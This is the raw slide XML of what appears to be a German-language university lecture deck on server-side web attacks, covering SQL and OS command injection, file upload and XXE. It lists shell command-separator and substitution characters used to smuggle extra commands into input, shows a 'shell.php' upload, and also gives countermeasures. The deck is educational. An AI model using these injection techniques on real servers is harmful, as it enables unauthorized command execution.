              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xp_servicecontrol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AB46A-0C10-497F-9D7C-D352809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but gold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1F855-9BA5-401E-9FA9-4F35DB8F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90" y="2009510"/>
            <a:ext cx="9223220" cy="28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7D3DA8-CCE2-45CB-9C48-C1FB2C440583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622800" y="560653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effectLst/>
              </a:rPr>
              <a:t>https://xkcd.com/327/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8ADB578-D42B-4AE9-B36E-D123AE8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157288"/>
            <a:ext cx="60579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5A050C-3E21-4D98-A6FB-F7BD2052D8A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224867" y="6098957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https://9gag.com/gag/aBg8PLx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1498306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A90FFD-AEB3-4A81-BE76-CA633870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 b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4979309" y="651231"/>
            <a:ext cx="6467475" cy="2040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DFCC7ED-EDDF-4A54-8C95-2BAD39969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CEF7E55-8719-40D6-B1F5-DAB2AD5EAB51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237867" y="5361653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142B4-C17D-41DF-9098-F9EB368F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AD255C-90D1-4E50-88CB-991F1E15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94" y="5993004"/>
            <a:ext cx="2105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319747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5124D27-1669-4773-81F3-BB18EFE96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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2847975" y="387897"/>
            <a:ext cx="6496050" cy="20436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AA496DF-B173-42F3-9415-E93922FEB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D67CC2-CA5E-497C-87F1-BB0F3B4237DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574616" y="5149575"/>
            <a:ext cx="9722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818F2-CFED-494B-AAF0-473AA850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454" y="5862459"/>
            <a:ext cx="8317091" cy="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713550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74943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088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316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55C2CFD-5BA0-4F5C-AA14-E695FDB45076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996793" y="1077385"/>
            <a:ext cx="10198413" cy="20967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all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="66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82346-B876-4728-8AAF-1CEF2DE7FD56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128172" y="3683876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also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>attack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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>directly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416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70E234-74AC-4F22-A74B-0505CE224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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1898103" y="493985"/>
            <a:ext cx="8248650" cy="28225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690FC0-913E-4288-9C7E-A0633D65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73A6F5-F6BD-4D15-9866-8F3A51B13325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3152780" y="5152764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2B166-3DDB-431B-8123-D7E34D8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Characters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separation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7F541-BAE6-4467-B109-9D33DF8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Windows and Linux/Unix:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  &amp;   &amp;&amp;   |   ||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/>
              <a:t>Linux/Unix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  ;   \n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>command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`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>cmd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B76ED-A2F8-4177-8D49-4B3E81A68DF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293257" y="6308209"/>
            <a:ext cx="780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https://portswigger.net/web-security/os-command-injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3704459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613764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9101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1120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F6E9-23ED-49C4-9FF3-FF49879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93375-D79C-4050-8256-B9B1E639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OS-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code!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safer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APIs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Just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>don‘t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STRICT Input Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Whitelist, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Typecasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>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7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917130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207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534018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think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another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>way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inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> code on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>server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213134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4EFE98-B5B3-4C4F-AC1D-43D6FBC6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2" y="817999"/>
            <a:ext cx="10178916" cy="49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0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4395E09-CE5A-4903-93AF-246C12A0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33387"/>
            <a:ext cx="104203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5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A067256-774F-4A84-8375-3FB984FB4B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798787" y="74001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Array (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>   [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>pic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; Array (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [type] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>octet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>-stream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>phpXBWCgN</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; 107</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>   )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/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8FE9FE-9398-433B-8C02-0B116ECD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" y="3532663"/>
            <a:ext cx="7686837" cy="862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C6B943-318E-4568-B530-8F7636C84DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6452707" y="1813174"/>
            <a:ext cx="57392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it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comes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from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client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–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trustworthy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0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9433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3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00681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8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D7FDDA-EDE1-4AE7-BFCC-AFCF5BA7D893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/>
              <a:t>That</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>‘s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>pretty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> nice,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but </a:t>
            </a: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retrieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>data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83647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3672-24FB-44A3-B5D9-4C1450E7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request routing ???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51A4-CFAC-492A-A2CD-11B29D9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799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 routing:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>http://example.com/showprofile.php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Explicit routing: http://example.com/showprofile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e.g. Laravel (PHP): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Route::get('/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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>UserController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>::class, '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’]);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https://laravel.com/docs/8.x/routing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e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: Django (Python): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>urlpatterns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> = [ path('/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>views.userprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>)]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https://docs.djangoproject.com/en/3.1/topics/http/urls/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DF819DD0-E742-4E67-9762-50F655D2D9B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="10179262" y="1865588"/>
            <a:ext cx="189188" cy="851339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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  <a:gd name="connsiteX7" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY7" fmla="*/ 434183 h 851339"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 851339"/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88" h="851339" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52019" y="-298"/>
                  <a:pt x="93537" y="4752"/>
                  <a:pt x="94594" y="15765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118501" y="165787"/>
                  <a:pt x="77150" y="269671"/>
                  <a:pt x="94594" y="400225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96886" y="410851"/>
                  <a:pt x="127031" y="416827"/>
                  <a:pt x="189188" y="415990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="134887" y="415456"/>
                  <a:pt x="94631" y="420905"/>
                  <a:pt x="94594" y="431755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="97835" y="589540"/>
                  <a:pt x="70994" y="704786"/>
                  <a:pt x="94594" y="835574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101035" y="843755"/>
                  <a:pt x="53782" y="849544"/>
                  <a:pt x="0" y="851339"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-5401" y="665610"/>
                  <a:pt x="6591" y="631027"/>
                  <a:pt x="0" y="434183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-6591" y="237339"/>
                  <a:pt x="48781" y="119132"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="189188" h="851339" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52039" y="-200"/>
                  <a:pt x="92952" y="7208"/>
                  <a:pt x="94594" y="15765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95964" y="127570"/>
                  <a:pt x="63852" y="274985"/>
                  <a:pt x="94594" y="400225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103904" y="403414"/>
                  <a:pt x="142198" y="418763"/>
                  <a:pt x="189188" y="415990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138087" y="415228"/>
                  <a:pt x="95851" y="423471"/>
                  <a:pt x="94594" y="431755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123945" y="572589"/>
                  <a:pt x="57758" y="636080"/>
                  <a:pt x="94594" y="835574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102672" y="837887"/>
                  <a:pt x="52667" y="849917"/>
                  <a:pt x="0" y="851339"/>
                </a:cubicBezTo>
              </a:path>
              <a:path w="189188" h="851339" fill="none" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52626" y="-204"/>
                  <a:pt x="94434" y="7425"/>
                  <a:pt x="94594" y="15765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101263" y="181974"/>
                  <a:pt x="91762" y="255672"/>
                  <a:pt x="94594" y="400225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88783" y="407848"/>
                  <a:pt x="133699" y="417369"/>
                  <a:pt x="189188" y="415990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138104" y="417826"/>
                  <a:pt x="95621" y="424389"/>
                  <a:pt x="94594" y="431755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115117" y="561201"/>
                  <a:pt x="91715" y="735015"/>
                  <a:pt x="94594" y="835574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="100679" y="842162"/>
                  <a:pt x="52034" y="847203"/>
                  <a:pt x="0" y="851339"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="00FF00"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1016326206">
                  <a:prstGeom prst="rightBrace">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 8333"/>
                      <a:gd name="adj2" fmla="val 4886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20F731-1FBF-480D-90B2-A5A0802B7946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7588469" y="2457731"/>
            <a:ext cx="4435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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>  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br>
              <a:rPr lang="de-AT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>file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showprofile.php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executed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interpreter</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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808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81769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446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3977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963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97206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662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ok, </a:t>
            </a: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one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>special</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>filetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>left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72341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09F37A-27E9-4BD1-8CA2-65083E9F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1" y="1893174"/>
            <a:ext cx="4067845" cy="26078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2C9737-F714-4BA5-8EFA-7256F350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71" y="1893175"/>
            <a:ext cx="4647912" cy="2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1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7F056C-F162-4311-9271-30E4557D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0" y="594591"/>
            <a:ext cx="10877300" cy="5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83183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1928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7301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708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8471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1788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21235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166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11366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A4:2017-XML External </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>Entities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t>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626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3E285F-183B-432B-A0E8-C35C1FCA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" y="392486"/>
            <a:ext cx="11225492" cy="5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3016</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breitbild</PresentationFormat>
  <Paragraphs>499</Paragraphs>
  <Slides>86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1" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Office</vt:lpstr>
      <vt:lpstr>Server-side Attacks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Further exploitation</vt:lpstr>
      <vt:lpstr>Old but gold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Characters for separation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Countermeasures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Remember request routing ???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Billion Laughs Attack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2021-02-13T22:50:26Z</dcterms:modified>
</cp:coreProperties>
</file>